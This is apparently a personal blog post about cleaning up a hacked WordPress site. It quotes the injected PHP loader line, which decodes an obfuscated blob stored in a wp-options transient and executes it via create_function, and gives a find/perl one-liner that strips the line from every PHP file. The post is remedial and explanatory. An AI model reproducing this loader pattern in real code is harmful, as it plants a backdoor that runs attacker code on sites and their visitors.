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So I totally got hacked. Reminder: be vigilant about upgrading wordpress and its plugins, or bad things happen.

The hack looks like this, and appears all over the place, at the top of some files and the bottom of others. It decodes a huge blob of encoded text that was stuffed into one of the wp-options values.

get_option(\"_transient_feed_98e8dbd04edf43b096e815a29343b006\"); $z=base64_decode(str_rot13($z)); if(strpos($z,\"0FE00707\")!==false){ $_z=create_function(\"\",$z); @$_z(); }

My first thought: “Oh crap, removing that text from hundreds of files? No thanks.”. Command line to the rescue! Thanks to Perl for still being awesome after all these years.

find . -name "*.php" -exec perl -e 's/^.*_transient_feed_98e8dbd04edf43b096e815a29343b006.*$//g' -p -i {} \;

If you’ve been struck by the same thing, just replace the _transient_feed with your own (the numbers probably change). These script-kiddy hackers are a perpetual annoyance. Hey kids - go build something awesome and useful instead of messing our web sites.